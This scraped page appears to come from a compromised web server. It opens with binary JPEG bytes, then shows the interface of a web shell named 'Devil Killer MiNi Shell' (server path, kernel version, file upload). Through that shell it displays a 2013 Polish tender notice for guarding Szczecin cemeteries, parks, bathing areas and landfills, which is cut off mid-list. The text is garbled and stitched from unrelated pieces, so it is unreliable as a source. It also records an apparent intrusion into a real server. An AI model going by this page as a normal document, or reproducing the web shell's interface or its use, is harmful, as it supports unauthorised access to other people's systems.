JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131202/495690-N-2013.html

<p class="kh_header"><b>Szczecin: OCHRONA OBIEKTÓW 
ZAKŁADU USŁUG KOMUNALNYCH W SZCZECINIE
 (w podziale na części)</b><br>
<b>Numer ogłoszenia: 495690 - 2013; data zamieszczenia: 02.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych , ul. Ku Słońcu 125a, 71-080 Szczecin, woj. zachodniopomorskie, tel. 091 484 82 94, faks 091 484 80 55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zuk.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowy zakład budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OCHRONA OBIEKTÓW 
ZAKŁADU USŁUG KOMUNALNYCH W SZCZECINIE
 (w podziale na części).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest ochrona obiektów Zakładu Usług Komunalnych 
w Szczecinie - w podziale na części, tj.:
     CZĘŚĆ I:  	 Ochrona Cmentarza Centralnego w Szczecinie
     CZĘŚĆ II:  	 Ochrona Cmentarza Zachodniego przy ul. Bronowickiej w Szczecinie
     CZĘŚĆ III:  	 Ochrona terenu parku miejskiego Różanka w Szczecinie
     CZĘŚĆ IV: 	 Ochrona kąpielisk miejskich w Szczecinie
     CZĘŚĆ V: 	 Ochrona Teatru Letniego i rzeźby Ptaki w Szczecinie
     CZĘŚĆ VI: 	 Ochrona bazy składowiska odpadów komunalnych w Sierakowie
     CZĘŚĆ VII: 	 Ochrona składowiska odpadów komunalnych w Sierakowie
     CZĘŚĆ VIII: Ochrona składowiska odpadów komunalnych w Szczecinie - Kluczu 	
     
CPV 79710000-4  Usługi ochroniarskie 

2.  Przedmiot zamówienia obejmuje: 
CZĘŚĆ I - ochrona Cmentarza Centralnego w Szczecinie:
     1)	ochronę mienia na Cmentarzu Centralnym, administrowanym przez Zamawiającego 	przed kradzieżą i dewastacją oraz ochronę osób przebywających na Cmentarzu 	Centralnym przed napadami,
     2)	kontrolę podmiotów gospodarczych świadczących usługi na terenie Cmentarza 	Centralnego poprzez:
	a)  sprawdzanie wydawanych przez Zamawiającego zezwoleń na wykonywane usługi,
	b)  kontrolę wwożonych i wywożonych elementów nagrobków,
	c) sprawdzanie zgodności miejsc wykonywanych usług z miejscami określonymi 
	     w treści zezwoleń wydanych przez Zamawiającego, 
     3) 	kontrolę ruchu wszystkich pojazdów wjeżdżających i wyjeżdżających z terenu 	Cmentarza Centralnego wg wydanych przepustek na wjazd,
     4)	zapobieganie aktom wandalizmu oraz eliminowanie kradzieży nagrobków i roślin,             	  5)	egzekwowanie przestrzegania obowiązujących przepisów porządkowych,
     6)	kontrolę wwozu i wywozu odpadów,
     7)	monitoring pomieszczeń biurowych 	administracji Cmentarza Centralnego i siedziby 	Zamawiającego,


     8)	patrolowanie terenu:
a) od godz. 6.00 do godz. 21.00 - 1 patrol 2-osobowy, tj.: od 01.04.2014 r. - 05.11.2014 r. - stały patrol rowerowy, w pozostałym okresie realizacji zadania - partol pieszy),
b) od godz. 7.00 do godz. 18.00 - 3 patrole 2-osobowe, tj.: od 01.04.2014 r. - 05.11.2014 r. - patrole rowerowe, w pozostałym okresie realizacji zadania - partole piesze),
	c)  całodobowo - 1 patrol 2-osobowy, zmotoryzowany, 
     9)   obsługę Bramy Głównej Cmentarza Centralnego:
	a)  od godz. 6.00 do godz. 22.00 - jednoosobowa obsługa od poniedziałku do piątku 	     oraz w dniu Wszystkich Świętych,
	b)  od godz. 7.00 do godz. 18.00 - jednoosobowa obsługa w soboty,
10)	wyposażenie patroli w systemy kontroli wartowników oparte na technologii GPS, 
z możliwością weryfikacji wykonanych tras w czasie przeszłym i teraźniejszym, 
w tym:
	a) pozycjonowanie patroli w czasie rzeczywistym oraz archiwalne odwzorowanie
     przebiegu tras patroli (w tym postojów, zatrzymań, prędkości, pobytu
     w zdefiniowanych miejscach, przejazdu trasą),
b)	tworzenie dowolnych raportów patroli np. dziennych, miesięcznych, weekendowych, zatrzymań, postojów, pobytów w zdefiniowanych obszarach, przejazdów alejami,
c)	zaplanowanie przebiegu tras wraz z możliwością ich późniejszej weryfikacji,
d)	nieodpłatne udostępnianie w formie elektronicznej - na każde żądanie Zamawiającego - dziennych raportów tras wykonanych przez patrole,
11)	zapewnienie mobilnych zestawów telewizji przemysłowej, czyli:
a)	 5 mobilnych kamer obejmujących zabezpieczenie wskazanych przez
      Zamawiającego miejsc na cmentarzu i 1 kamerę stałą do zamontowania na maszcie
      wskazanym przez Zamawiającego.
                  Parametry:
kamera IP,
zmienna ogniskowa - 3,6-9 mm obiektyw,
dzień/noc,
zewnętrzny doświetlacz podczerwieni IR 
zasięg min 30 m (kąt min. 90 stopni),
rozdzielczość pozwalająca czytelnie rejestrować obraz w dzień i w nocy,
możliwość zaprogramowania stref alarmowych z wysyłaniem alarmu w czasie
          realnym do stacji Monitoringu Operatora Kamer,
bufor pamięci z kamery minimum 14 dni,
obudowa zewnętrzna IP66 z autonomicznym mocowaniem,
wskazywanie aktualnych parametrów kamery na Stacji Monitoringu Operatora,
                     tj. sabotaż kamery, niskie napięcie, alarm wyzwolony naruszeniem strefy, próba
                     demontażu lub zmiany lokalizacji kamery,
akumulator kamery - min. 7 dni,
obudowa kamery kamuflowana, z grzałką,
b) stałe udostępnienie podglądu kamer, w czasie rzeczywistym, obsłudze Bramy
                 Głównej Cmentarza Centralnego,
c)	ciągłą rejestrację i transmisję z 6 kamer oraz archiwizację (do 10 dni),
d)	podłączenie zamontowanych kamer za pomocą zdalnego centrum monitorowania oraz reagowania na zauważone zdarzenia, do punktu ochrony przy Bramie Głównej Cmentarza Centralnego, wraz z dodatkowym wyposażeniem odbioru obrazu,
    12)	konserwację urządzeń monitorujących - co kwartał.

CZĘŚĆ II - ochrona Cmentarza Zachodniego przy ul. Bronowickiej w Szczecinie:
    1)    ochrona poprzez:
a)	bezpośrednią całodobową ochronę fizyczną - 1 pracownik ochrony obsługujący całodobowo system monitoringu,
b)	wsparcie przez grupę interwencyjną w przypadku zdarzeń o charakterze szczególnym typu: akty wandalizmu i niszczenia mienia, odmowa wykonania poleceń dotyczących np. opuszczenia obiektu, nieobyczajne lub agresywne zachowanie,

CZĘŚĆ III - ochrona terenu parku miejskiego Różanka w Szczecinie:
1)    ochrona poprzez:
	  a) bezpośrednią całodobową ochronę fizyczną wraz z podejmowaniem doraźnych 	       interwencji ogrodzonego terenu (2 ha) parku miejskiego Różanka, 	
     	  b)  otwieranie i zamykanie bram (rano i wieczorem),
              c)  wsparcie przez grupę interwencyjną w przypadku zdarzeń o charakterze 	           	       szczególnym typu: akty wandalizmu i niszczenia mienia, odmowa wykonania 	       poleceń dot. np. opuszczenia obiektu, nieobyczajne lub agresywne zachowanie,
      2) Wykonawca zapewni pomieszczenie socjalne wraz z niezbędną infrastrukturą dla 		 osoby dozorującej (istnieje możliwość ustawienia pomieszczenia socjalnego dla 	 	 osoby 	dozorującej, na działce Zamawiającego przylegającej bezpośrednio do terenu 		 Różanki),
      3)   Obiekt w godzinach nocnych jest zamknięty dla zwiedzających.

CZĘŚĆ IV - ochrona kąpielisk miejskich w Szczecinie:
1)  ochrona poprzez:
     a) patrole lotne (z wyłączeniem otwierania i zamykania bram kąpielisk):
	     A.  od 01.01.2014 r. do 31.03.2014 r. - 1 patrol w godzinach 21.00 - 1.00,
          B.  od 01.04.2014 r. do 14.06.2014 r. - 2 patrole, w godzinach 21.00 - 23.00 i 1.00 	           - 3.00,
	     C.  od 15.06.2014 r. do 31.08.2014 r. - 2 patrole, w godzinach 23.00 - 1.00 i 2.00 -  	           4.00,
	     D.  od 01.09.2014 r. do 31.10.2014 r. - 2 patrole, w godzinach 21.00 - 23.00 i 1.00 	           - 3.00,
          E.  od 01.11.2014 r. do 31.12.2014 r. - 1 patrol, w godzinach 21.00 - 1.00,
          - pobyt patroli lotnych będzie potwierdzany wydrukiem z systemu kontroli 		       wartowników (Dąbie - 2 punkty kontrolne, Dziewoklicz - 2 punkty kontrolne,
            Głębokie - 1 punkt kontrolny), przekazywanym raz w miesiącu Zamawiającemu,
            b) patrol pieszy w okresie od 15.06.2014 r. do 31.08.2014 r. w godzinach 13.00 - 	     17.00,
- pobyt patroli pieszych będzie potwierdzany wydrukiem z systemu kontroli
wartowników (Dąbie - 2 punkty kontrolne, Dziewoklicz - 2 punkty kontrolne, Głębokie - 1 punkt kontrolny), przekazywanym raz w miesiącu Zamawiającemu,
     c) otwieranie i zamykanie bram wejściowych kąpielisk:
	      A. otwieranie - godz. 10.00 - w soboty, niedziele i święta w okresach:
	           od 01.01.2014 r. do 14.06.2014 r. i od 01.09.2014 r. do 31.12.2014 r., 
	      B. zamykanie:
                - godz. 16.00 - w soboty, niedziele i święta w okresach:
                   od 01.01.2014 r. do 31.03.2014 r. i od 31.10.2014 r. do 31.12.2014 r.,
                -  godz. 20.00 - w soboty, niedziele i święta w okresach:
		        od 01.04.2014 r. do 14.06.2014 r. i od 01.09.2014 r. do 30.10.2014 r.,
                -  godz. 20.00 - codziennie w okresie:
		        od 01.04.2014 r. do 14.06.2014 r. i od 01.09.2014 r. do 31.10.2014 r.,
		     -  w godz. 20.00 - 20.30 - codziennie w okresie:
                   od 15.06.2014 r. do 31.08.2014 r.
     d) stały (telefoniczny i radiowy) dozór sygnałów przesyłanych, gromadzonych 
	      i przetwarzanych w systemie alarmowym oraz doraźna interwencja (w przypadku 	      odebrania sygnału o zdarzeniu, niezwłoczne skierowanie grupy interwencyjnej 
           na miejsce zdarzenia),
2)   konserwacja 3 systemów alarmowych - co kwartał, w obecności kierownika 		  kąpieliska lub osoby przez niego upoważnionej (konserwacja obejmuje wymianę 	  urządzeń i baterii typ 9V/6AM6, TL5902, 6LF22).

CZĘŚĆ V - ochrona Teatru Letniego i rzeźby Ptaki w Szczecinie:
1)    ochrona poprzez:
  a) bezpośrednią ochronę fizyczną - z wykorzystaniem istniejącego systemu CCTV, 
z patrolowaniem minimum raz na godzinę w godzinach otwarcia obiektu oraz minimum raz na dwie godziny w czasie zamknięcia obiektu, wraz  
z podejmowaniem doraźnej interwencji:  
        A. w dni powszednie - od godz. 15.00 do godz. 7.00 dnia następnego 
              (16 h x 250 dni = 4000 h rocznie),
        B.  w dni wolne od pracy - całodobowo
              (24 h x 115 dni = 2760 h rocznie),  
       b) niezwłoczne wsparcie przez grupę interwencyjną zarówno pracownika ochrony 	        fizycznej jak i pracowników Zamawiającego, w przypadku zdarzeń o charakterze 	        szczególnym typu:
  	         A. akty wandalizmu i niszczenia mienia,
	         B. odmowa wykonania poleceń dot. np. opuszczenia obiektu, zaprzestania 		              spożywania alkoholu na terenie obiektu, nieobyczajne lub agresywne 			  zachowanie,
   	         C. łamanie zapisów regulaminu obiektu,
	         - W przypadku zaistnienia zdarzeń, o których mowa powyżej, Wykonawca 		 będzie miał obowiązek przygotować materiał z CCTV w celu zgłoszenia 		 popełnienia czynu zabronionego odpowiednim służbom, 
              c)	stosowanie systemu kontroli wewnętrznej sposobu realizacji zadań przez pracowników ochrony - koszt instalacji i utrzymania systemu ponosi Wykonawca,
	d)	pracownicy ochrony winni być wyposażeni w niezbędny sprzęt ochrony osobistej, środki przymusu bezpośredniego oraz bezprzewodowe środki łączności radiowej bądź telefonicznej, a także odpowiednio umundurowani lub ubrani w odzież służbową dostosowana do pory roku,
       e) stały (telefoniczny i radiowy) dozór sygnałów przesyłanych, gromadzonych 
	        i przetwarzanych w systemie alarmowym oraz doraźna interwencja (w przypadku 	        odebrania sygnału o zdarzeniu, niezwłoczne skierowanie grupy interwencyjnej 
             na miejsce zdarzenia),
      2)   konserwację systemu alarmowego - co kwartał, w obecności kierownika obiektu.

CZĘŚĆ VI - ochrona bazy składowiska odpadów komunalnych w Sierakowie:
       1)  ochrona poprzez:
     a) patrol pieszy wraz z otwieraniem i zamykaniem bramy:

	    A. w dni robocze - 4 patrole w godzinach: 
              2.00 - 4.00, 12.00 - 14.00, 17.00 - 19.00, 22.00 - 24.00,
	    B. w soboty, niedziele i święta - 5 patroli w godzinach:
	         2.00 - 4.00, 7.00 - 9.00, 12.00 - 14.00, 17.00 - 19.00, 22.00 - 24.00,
	     -  pobyt patroli pieszych będzie potwierdzany wydrukiem z systemu kontroli 		        wartowników (4 punkty kontrolne), przekazywanym raz w miesiącu
                    Zamawiającemu,
             b)	zapewnienie systemu łączności pomiędzy bazą Wykonawcy i osobami wykonującymi patrole - koszt systemu łączności ponosi Wykonawca.

CZĘŚĆ VII - ochrona składowiska odpadów komunalnych w Sierakowie:
1)  ochrona poprzez:
	   a) bezpośrednią ochronę fizyczną -  wraz z podejmowaniem doraźnej interwencji: 
                   A. w dni robocze od poniedziałku do piątku:
		- od godz. 15.00 do godz. 7.00  - 1 osoba,
          B. w soboty, niedziele i święta :
		-  całodobowo - 1 osoba,
      2)	pracownik ochrony ma obowiązek pozostać na składowisku do momentu przybycia 	przedstawiciela Zamawiającego uprawnionego do przejęcia chronionego obiektu,
      3)	Wykonawca ma obowiązek prowadzić księgę raportów dyżurów, w której to księdze 	wpisywane będą raporty obejmujące wszystkie zdarzenia zaistniałe w trakcie dyżuru 	oraz odnotować stan chronionego obiektu przy jego przyjęciu i zdaniu,
      4)	Wykonawca ma obowiązek zapewnić na własny koszt sprawnego systemu łączności
	pomiędzy osobami wykonującymi ochronę fizyczną a ich bazą,
      5)	zakres usługi ochrony: 
	a)	ochrona składowiska przed kradzieżą, zniszczeniem, utratą, pożarem itp., 
a w szczególności dokonywanie regularnych obchodów, informowanie Zamawiającego o wszelkich nieprawidłowościach lub zdarzeniach losowych, zawiadamianie Policji i odpowiednich służb o zaistniałych zdarzeniach, podejmowanie niezbędnych  działań w razie zamachu na chroniony majątek oraz w razie pożaru - określonych w instrukcji p. poż., ochronę obiektów przed  ingerencją  osób nieupoważnionych, 
b)  ochrona majątku ruchomego i nieruchomego składowiska (kwatery nr 1, 2, 3, 4 ), w granicach ogrodzenia z siatki stalowej, terenu przyległego do wałów, 
ze szczególnym uwzględnieniem sprzętu mechanicznego, baraków wraz 
z wyposażeniem, urządzeń technologicznych na terenie składowiska, geomembrany, oświetlenia składowiska, ogrodzenia przenośnego, zbiorników wód odciekowych oraz innych urządzeń znajdujących się na składowisku,      
c)	kontrola stopnia napełniania zbiorników retencyjnych wód odciekowych, 
a w przypadku awarii systemu przepompowni wód retencyjnych i przepełnienia się zbiornika powyżej stanu alarmowego, pracownik ochrony zobowiązany jest 
do natychmiastowego powiadomienia osoby wskazanej przez Zamawiającego,
     d)	nie dopuszczenie do nieuprawnionego składowania odpadów na obiekcie 
i terenach bezpośrednio do niego przyległych, tj. ochrona przed powstawaniem tzw. dzikich wysypisk, a w przypadku dojścia do próby składowania odpadów przez osoby trzecie, pracownik ochrony ma obowiązek zapisania numeru rejestracyjnego pojazdu i innych danych służących ustaleniu sprawcy 
i natychmiastowego powiadomienia właściwych służb oraz Zamawiającego; 
w przypadku stwierdzenia przez Zamawiającego, że podczas pełnienia dyżuru 
na obiekcie składowiska doszło do nielegalnego składowania odpadów, kosztami usunięcia odpadów zostanie obciążony Wykonawca.    

CZĘŚĆ VIII - ochrona składowiska odpadów komunalnych w Szczecinie - Kluczu:
1)  ochrona poprzez:
     a) patrol pieszy wraz z otwieraniem i zamykaniem bramy:
	    A. w dni robocze - 3 patrole w godzinach: 
              2.00 - 4.00, 17.00 - 19.00, 22.00 - 24.00,
	    B. w soboty, niedziele i święta - 5 patroli w godzinach:
	         2.00 - 4.00, 7.00 - 9.00, 12.00 - 14.00, 17.00 - 19.00, 22.00 - 24.00,
	     -  pobyt patroli pieszych będzie potwierdzany wydrukiem z systemu kontroli 		        wartowników, przekazywanym raz w miesiącu Zamawiającemu.
             b)	zapewnienie systemu łączności pomiędzy bazą Wykonawcy i osobami wykonującymi patrole - koszt systemu łączności ponosi Wykonawca..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających - do 5 % wartości zamówienia podstawowego - polegających na powtórzeniu tego samego rodzaju usług.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dot. części I, II, III, IV, V, VI, VII, VIII:
Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że posiada uprawnienia do prowadzenia działalności w zakresie objętym przedmiotem zamówienia, zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia 
(Dz. U. z 2005 r. Nr 145 poz. 1221 ze zmianami)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dot. części I:
Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonuje lub wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  trzy główne usługi. 
Za główną usługę Zamawiający uzna pracę polegającą na ochronie fizycznej obiektu stanowiącego teren wraz z infrastrukturą towarzyszącą, o powierzchni co najmniej 
30 ha, takiego jak plac budowy, obiekt sportowy, teren rekreacyjny, parking, cmentarz - wykonywanej przez ciągły okres co najmniej 12 miesięcy do dnia, w którym upływa termin składania ofert, oraz o wartości nie mniejszej niż 150 000,00 zł brutto, w tym okresie.

- dot. części II:
Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonuje lub wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  dwie główne usługi. 
Za główną usługę Zamawiający uzna pracę polegającą na ochronie fizycznej obiektu, takiego jak plac budowy, obiekt sportowy, teren rekreacyjny, parking, cmentarz - wykonywanej przez ciągły okres co najmniej 12 miesięcy do dnia, w którym upływa termin składania ofert, oraz o wartości nie mniejszej niż 40 000,00 zł brutto, w tym okresie.

- dot. części III:
Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonuje lub wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  dwie główne usługi. 
Za główną usługę Zamawiający uzna pracę polegającą na ochronie fizycznej obiektu, takiego jak plac budowy, obiekt sportowy, teren rekreacyjny, parking, o wartości nie mniejszej niż 40 000,00 zł brutto do dnia, w którym upływa termin składania ofert. 

- dot. części IV:
Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonuje lub wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  dwie główne usługi. 
Za główną usługę Zamawiający uzna pracę polegającą na ochronie fizycznej obiektu, takiego jak plac budowy, obiekt sportowy, teren rekreacyjny, parking, poprzez wykonywanie patroli pieszych (patroli lotnych), o wartości nie mniejszej niż 35 000,00 zł brutto do dnia, w którym upływa termin składania ofert. 

- dot. części V:
Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonuje lub wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  dwie główne usługi. 
Za główną usługę Zamawiający uzna pracę polegającą na ochronie fizycznej obiektu, takiego jak plac budowy, obiekt sportowy, teren rekreacyjny, parking, o wartości nie mniejszej niż 40 000,00 zł brutto do dnia, w którym upływa termin składania ofert. 

- dot. części VI:
Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonuje lub wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  jedną główną usługę. 
Za główną usługę Zamawiający uzna pracę polegającą na ochronie fizycznej obiektu, takiego jak plac budowy, obiekt sportowy, teren rekreacyjny, parking, poprzez wykonywanie patroli pieszych (patroli lotnych), o wartości nie mniejszej niż 20 000,00 zł brutto do dnia, w którym upływa termin składania ofert. 

- dot. części VII:
Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonuje lub wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  dwie główne usługi. 
Za główną usługę Zamawiający uzna pracę polegającą na ochronie fizycznej obiektu, takiego jak plac budowy, obiekt sportowy, teren rekreacyjny, parking, o wartości nie mniejszej niż 30 000,00 zł brutto do dnia, w którym upływa termin składania ofert. 

- dot. części VIII: 
Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonuje lub wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  jedną główną usługę. 
Za główną usługę Zamawiający uzna pracę polegającą na ochronie fizycznej obiektu, takiego jak plac budowy, obiekt sportowy, teren rekreacyjny, parking, poprzez wykonywanie patroli pieszych (patroli lotnych), o wartości nie mniejszej niż 15 000,00 zł brutto do dnia, w którym upływa termin składania ofert. 

W przypadku składania przez Wykonawcę oferty na więcej niż jedną część, Zamawiający dopuszcza możliwość łącznego spełniania ww. warunku (wykazania tych samych usług głównych) z uwzględnieniem ilości i wartości usług głównych określonych
w opisie sposobu dokonywania oceny spełniania warunku dla poszczególnych części.
  
W przypadku, gdy jakakolwiek wartość dotycząca ww. warunku została wyrażona 
w walucie obcej, Zamawiający przeliczy tą wartość w oparciu o średni kurs walut NBP dla danej waluty z daty wszczęcia postępowania o udzielenie zamówienia publicznego (datą wszczęcia postępowania jest data zamieszczenia ogłoszenia o zamówieniu w miejscu publicznie dostępnym w siedzibie Zamawiającego oraz na stronie internetowej).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dot. części I:
Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, dysponuje lub będzie dysponować co najmniej: 
a) 10 osobami, posiadającymi licencje pracownika ochrony fizycznej  pierwszego stopnia,
oraz
